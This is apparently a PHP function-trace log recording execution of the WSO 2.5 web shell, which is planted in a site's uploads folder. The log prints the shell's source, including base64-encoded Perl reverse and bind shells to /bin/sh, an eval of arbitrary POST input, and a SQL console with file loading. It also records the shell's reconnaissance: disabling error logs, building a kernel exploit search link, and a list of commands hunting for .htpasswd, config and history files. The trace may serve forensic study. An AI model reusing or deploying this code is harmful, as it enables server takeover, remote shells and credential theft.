")\'>Next &gt;</a>";\n\r                    $_POST[\'p3\']--;\n\r\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\n\r\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\n\r\t\t\t\t\telse\n\r\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\n\r\t\t\t\t\techo "<br><br>";\n\r\t\t\t\t}\n\r\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\n\r\t\t\t\t\t$db->query(@$_POST[\'p2\']);\n\r\t\t\t\t\tif($db->res !== false) {\n\r\t\t\t\t\t\t$title = false;\n\r\t\t\t\t\t\techo \'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">\';\n\r\t\t\t\t\t\t$line = 1;\n\r\t\t\t\t\t\twhile($item = $db->fetch())\t{\n\r\t\t\t\t\t\t\tif(!$title)\t{\n\r\t\t\t\t\t\t\t\techo \'<tr>\';\n\r\t\t\t\t\t\t\t\tforeach($item as $key => $value)\n\r\t\t\t\t\t\t\t\t\techo \'<th>\'.$key.\'</th>\';\n\r\t\t\t\t\t\t\t\treset($item);\n\r\t\t\t\t\t\t\t\t$title=true;\n\r\t\t\t\t\t\t\t\techo \'</tr><tr>\';\n\r\t\t\t\t\t\t\t\t$line = 2;\n\r\t\t\t\t\t\t\t}\n\r\t\t\t\t\t\t\techo \'<tr class="l\'.$line.\'">\';\n\r\t\t\t\t\t\t\t$line = $line==1?2:1;\n\r\t\t\t\t\t\t\tforeach($item as $key => $value) {\n\r\t\t\t\t\t\t\t\tif($value == null)\n\r\t\t\t\t\t\t\t\t\techo \'<td><i>null</i></td>\';\n\r\t\t\t\t\t\t\t\telse\n\r\t\t\t\t\t\t\t\t\techo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\n\r\t\t\t\t\t\t\t}\n\r\t\t\t\t\t\t\techo \'</tr>\';\n\r\t\t\t\t\t\t}\n\r\t\t\t\t\t\techo \'</table>\';\n\r\t\t\t\t\t} else {\n\r\t\t\t\t\t\techo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\n\r\t\t\t\t\t}\n\r\t\t\t\t}\n\r\t\t\t\techo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\n\r                if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\n\r                    echo htmlspecialchars($_POST[\'p2\']);\n\r                echo "</textarea><br/><input type=submit value=\'Execute\'>";\n\r\t\t\t\techo "</td></tr>";\n\r\t\t\t}\n\r\t\t\techo "</table></form><br/>";\n\r            if($_POST[\'type\']==\'mysql\') {\n\r                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\n\r                if($db->fetch())\n\r                    echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input  class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\n\r            }\n\r\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\n\r\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\n\r\t\t\t\techo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\n\r\t\t\t}\n\r\t} else {\n\r        echo htmlspecialchars($db->error());\n\r    }\n\r\techo \'</div>\';\n\r\twsoFooter();\n\r}\n\rfunction actionNetwork() {\n\r\twsoHeader();\n\r\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\n\r\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\n\r\techo "<h1>Network tools</h1><div class=content>\n\r\t<form name=\'nfp\' onSubmit=\\"g(null,null,\'bpp\',this.port.value);return false;\\">\n\r\t<span>Bind port to /bin/sh [perl]</span><br/>\n\r\tPort: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\n\r\t</form>\n\r\t<form name=\'nfp\' onSubmit=\\"g(null,null,\'bcp\',this.server.value,this.port.value);return false;\\">\n\r\t<span>Back-connect  [perl]</span><br/>\n\r\tServer: <input type=\'text\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\n\r\t</form><br>";\n\r\tif(isset($_POST[\'p1\'])) {\n\r\t\tfunction cf($f,$t) {\n\r\t\t\t$w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\n\r\t\t\tif($w){\n\r\t\t\t\t@fwrite($w,@base64_decode($t));\n\r\t\t\t\t@fclose($w);\n\r\t\t\t}\n\r\t\t}\n\r\t\tif($_POST[\'p1\'] == \'bpp\') {\n\r\t\t\tcf("/tmp/bp.pl",$bind_port_p);\n\r\t\t\t$out = wsoEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");\n\r            sleep(1);\n\r\t\t\techo "<pre class=ml1>$out\\n".wsoEx("ps aux | grep bp.pl")."</pre>";\n\r            unlink("/tmp/bp.pl");\n\r\t\t}\n\r\t\tif($_POST[\'p1\'] == \'bcp\') {\n\r\t\t\tcf("/tmp/bc.pl",$back_connect_p);\n\r\t\t\t$out = wsoEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");\n\r            sleep(1);\n\r\t\t\techo "<pre class=ml1>$out\\n".wsoEx("ps aux | grep bc.pl")."</pre>";\n\r            unlink("/tmp/bc.pl");\n\r\t\t}\n\r\t}\n\r\techo \'</div>\';\n\r\twsoFooter();\n\r}\n\rfunction actionRC() {\n\r\tif(!@$_POST[\'p1\']) {\n\r\t\t$a = array(\n\r\t\t\t"uname" => php_uname(),\n\r\t\t\t"php_version" => phpversion(),\n\r\t\t\t"wso_version" => WSO_VERSION,\n\r\t\t\t"safemode" => @ini_get(\'safe_mode\')\n\r\t\t);\n\r\t\techo serialize($a);\n\r\t} else {\n\r\t\teval($_POST[\'p1\']);\n\r\t}\n\r}\n\rif( empty($_POST[\'a\']) )\n\r\tif(isset($default_action) && function_exists(\'action\' . $default_action))\n\r\t\t$_POST[\'a\'] = $default_action;\n\r\telse\n\r\t\t$_POST[\'a\'] = \'SecInfo\';\n\rif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\n\r\tcall_user_func(\'action\' . $_POST[\'a\']);\n\rexit;'	/var/www/html/uploads/00977a.php	4	0
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1	$auth_pass = ''
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	3	$color = '#df5'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	5	$default_action = 'FilesMan'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	7	$default_use_ajax = TRUE
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	9	$default_charset = 'Windows-1251'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	14	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3	9	0	0.006658	1143112	implode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	16	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3	9	1	0.006680	1143256
3	9	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
3	10	0	0.006698	1143192	preg_match	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	16	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i'	'python-requests/2.25.1'
3	10	1	0.006753	1143256
3	10	R			0
3	11	0	0.006768	1143112	ini_set	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	27	2	'error_log'	NULL
3	11	1	0.006785	1143184
3	11	R			''
3	12	0	0.006798	1143112	ini_set	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	29	2	'log_errors'	0
3	12	1	0.006813	1143184
3	12	R			'1'
3	13	0	0.006826	1143112	ini_set	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	31	2	'max_execution_time'	0
3	13	1	0.006841	1143152
3	13	R			'0'
3	14	0	0.006854	1143080	set_time_limit	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	33	1	0
3	14	1	0.006869	1143144
3	14	R			FALSE
3	15	0	0.006882	1143112	define	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	35	2	'WSO_VERSION'	'2.5'
3	15	1	0.006897	1143216
3	15	R			TRUE
3	16	0	0.006910	1143144	get_magic_quotes_gpc	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	38	0
3	16	1	0.006923	1143144
3	16	R			FALSE
3	17	0	0.006937	1143144	substr	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	83	3	'Linux'	0	3
3	17	1	0.006951	1143272
3	17	R			'Lin'
3	18	0	0.006964	1143176	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	83	1	'Lin'
3	18	1	0.006978	1143240
3	18	R			'lin'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	89	$os = 'nix'
3	19	0	0.007003	1143144	ini_get	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	92	1	'safe_mode'
3	19	1	0.007017	1143176
3	19	R			FALSE
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	92	$safe_mode = FALSE
3	20	0	0.007042	1143144	error_reporting	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	96	1	0
3	20	1	0.007055	1143184
3	20	R			0
3	21	0	0.007068	1143144	ini_get	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	99	1	'disable_functions'
3	21	1	0.007082	1143624
3	21	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	99	$disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
3	22	0	0.007133	1143592	getcwd	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	101	0
3	22	1	0.007147	1143640
3	22	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	101	$home_cwd = '/var/www/html/uploads'
3	23	0	0.007180	1143640	getcwd	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	107	0
3	23	1	0.007194	1143688
3	23	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	107	$cwd = '/var/www/html/uploads'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	119	$cwd .= '/'
3	24	0	0.007232	1143688	md5	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	122	1	'localhost'
3	24	1	0.007246	1143784
3	24	R			'421aa90e079fa326b6494f812ad13e79'
3	25	0	0.007262	1143688	md5	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	124	1	'localhost'
3	25	1	0.007275	1143784
3	25	R			'421aa90e079fa326b6494f812ad13e79'
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	124	_COOKIE['421aa90e079fa326b6494f812ad13e79ajax'] = TRUE
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	155	$aliases = ['List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find all suid files' => 'find / -type f -perm -04000 -ls', 'find suid files in current dir' => 'find . -type f -perm -04000 -ls', 'find all sgid files' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config* files' => 'find / -type f -name "config*"', 'find config* files in current dir' => 'find . -type f -name "config*"', 'find all writable folders and files' => 'find / -perm -2 -ls', 'find all writable folders and files in current dir' => 'find . -perm -2 -ls', 'find all service.pwd files' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find all .htpasswd files' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find all .bash_history files' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf files' => 'locate httpd.conf', 'locate vhosts.conf files' => 'locate vhosts.conf', 'locate proftpd.conf files' => 'locate proftpd.conf', 'locate psybnc.conf files' => 'locate psybnc.conf', 'locate my.conf files' => 'locate my.conf', 'locate admin.php files' => 'locate admin.php', 'locate cfg.php files' => 'locate cfg.php', 'locate conf.php files' => 'locate conf.php', 'locate config.dat files' => 'locate config.dat', 'locate config.php files' => 'locate config.php', 'locate config.inc files' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php files' => 'locate config.default.php', 'locate config* files ' => 'locate config', 'locate .conf files' => 'locate \'.conf\'', 'locate .pwd files' => 'locate \'.pwd\'', 'locate .sql files' => 'locate \'.sql\'', 'locate .htpasswd files' => 'locate \'.htpasswd\'', 'locate .bash_history files' => 'locate \'.bash_history\'', 'locate .mysql_history files' => 'locate \'.mysql_history\'', 'locate .fetchmailrc files' => 'locate \'.fetchmailrc\'', 'locate backup files' => 'locate backup', 'locate dump files' => 'locate dump', 'locate priv files' => 'locate priv']
3	26	0	0.007377	1144128	function_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	578	1	'posix_getpwuid'
3	26	1	0.007392	1144168
3	26	R			TRUE
3	27	0	0.007405	1144128	function_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	582	1	'posix_getgrgid'
3	27	1	0.007419	1144168
3	27	R			TRUE
3	28	0	0.007433	1144168	function_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	2985	1	'actionFilesMan'
3	28	1	0.007448	1144208
3	28	R			TRUE
2		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	2987	_POST['a'] = 'FilesMan'
3	29	0	0.007475	1144544	function_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	2993	1	'actionFilesMan'
3	29	1	0.007489	1144584
3	29	R			TRUE
3	30	0	0.007504	1144504	actionFilesMan	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	2995	0
4	31	0	0.007518	1144504	wsoHeader	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1230	0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	256	_POST['charset'] = 'Windows-1251'
5	32	0	0.007547	1145784	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	308	1	'/var/www/html/uploads/'
5	32	1	0.007565	1145976
5	32	R			'/var/www/html/uploads/'
5	33	0	0.007580	1145784	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	310	1	'FilesMan'
5	33	1	0.007594	1145976
5	33	R			'FilesMan'
5	34	0	0.007608	1145784	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	312	1	'Windows-1251'
5	34	1	0.007622	1145976
5	34	R			'Windows-1251'
5	35	0	0.007637	1145784	strpos	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	314	2	NULL	'\n'
5	35	1	0.007652	1145856
5	35	R			FALSE
5	36	0	0.007666	1145784	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	314	2	NULL	3
5	36	1	0.007680	1146016
5	36	R			''
5	37	0	0.007694	1146040	strpos	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	316	2	NULL	'\n'
5	37	1	0.007708	1146112
5	37	R			FALSE
5	38	0	0.007721	1146040	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	316	2	NULL	3
5	38	1	0.007739	1146272
5	38	R			''
5	39	0	0.007753	1146040	strpos	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	318	2	NULL	'\n'
5	39	1	0.007767	1146112
5	39	R			FALSE
5	40	0	0.007780	1146040	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	318	2	NULL	3
5	40	1	0.007794	1146272
5	40	R			''
5	41	0	0.007807	1147064	addslashes	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	356	1	'/uploads/00977a.php'
5	41	1	0.007821	1147096
5	41	R			'/uploads/00977a.php'
5	42	0	0.007837	1144504	diskfreespace	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	420	1	'/var/www/html/uploads/'
5	42	1	0.007857	1144536
5	42	R			198164074496
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	420	$freeSpace = 198164074496
5	43	0	0.007884	1144504	disk_total_space	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	422	1	'/var/www/html/uploads/'
5	43	1	0.007899	1144536
5	43	R			232015802368
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	422	$totalSpace = 232015802368
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	424	$totalSpace = 232015802368
5	44	0	0.007936	1144504	php_uname	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	426	1	'r'
5	44	1	0.007951	1144584
5	44	R			'5.15.0-60-generic'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	426	$release = '5.15.0-60-generic'
5	45	0	0.007977	1144552	php_uname	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	428	1	's'
5	45	1	0.007990	1144616
5	45	R			'Linux'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	428	$kernel = 'Linux'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	430	$explink = 'http://exploit-db.com/search/?action=search&filter_description='
5	46	0	0.008029	1144584	strpos	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	432	2	'Linux'	'Linux'
5	46	1	0.008043	1144656
5	46	R			0
5	47	0	0.008056	1144584	substr	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	434	3	'5.15.0-60-generic'	0	6
5	47	1	0.008070	1144712
5	47	R			'5.15.0'
5	48	0	0.008083	1144632	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	434	1	'Linux Kernel 5.15.0'
5	48	1	0.008097	1144712
5	48	R			'Linux+Kernel+5.15.0'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	434	$explink .= 'Linux+Kernel+5.15.0'
5	49	0	0.008124	1144696	function_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	440	1	'posix_getegid'
5	49	1	0.008137	1144736
5	49	R			TRUE
5	50	0	0.008151	1144696	posix_geteuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	452	0
5	50	1	0.008165	1144696
5	50	R			33
5	51	0	0.008177	1144696	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	452	1	33
5	51	1	0.008213	1145528
5	51	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	452	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
5	52	0	0.008257	1145496	posix_getegid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	454	0
5	52	1	0.008270	1145496
5	52	R			33
5	53	0	0.008283	1145496	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	454	1	33
5	53	1	0.008311	1146160
5	53	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	454	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	456	$user = 'www-data'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	458	$uid = 33
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	460	$group = 'www-data'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	462	$gid = 33
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	467	$cwd_links = ''
5	54	0	0.008402	1144776	explode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	469	2	'/'	'/var/www/html/uploads/'
5	54	1	0.008421	1145384
5	54	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	469	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	471	$n = 6
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	473	$i = 0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	475	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j = 0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= '/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	481	$cwd_links .= '")\'>/</a>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	473	$i++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	475	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j = 0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= '/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	481	$cwd_links .= '")\'>var/</a>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	473	$i++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	475	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j = 0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= '/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'www/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	481	$cwd_links .= '")\'>www/</a>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	473	$i++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	475	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j = 0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= '/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'www/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'html/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	481	$cwd_links .= '")\'>html/</a>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	473	$i++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	475	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j = 0
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= '/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'var/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'www/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'html/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	479	$cwd_links .= 'uploads/'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	477	$j++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	481	$cwd_links .= '")\'>uploads/</a>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	473	$i++
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	486	$charsets = [0 => 'UTF-8', 1 => 'Windows-1251', 2 => 'KOI8-R', 3 => 'KOI8-U', 4 => 'cp866']
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	488	$opt_charsets = ''
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	492	$opt_charsets .= '<option value="UTF-8" >UTF-8</option>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	492	$opt_charsets .= '<option value="Windows-1251" selected>Windows-1251</option>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	492	$opt_charsets .= '<option value="KOI8-R" >KOI8-R</option>'
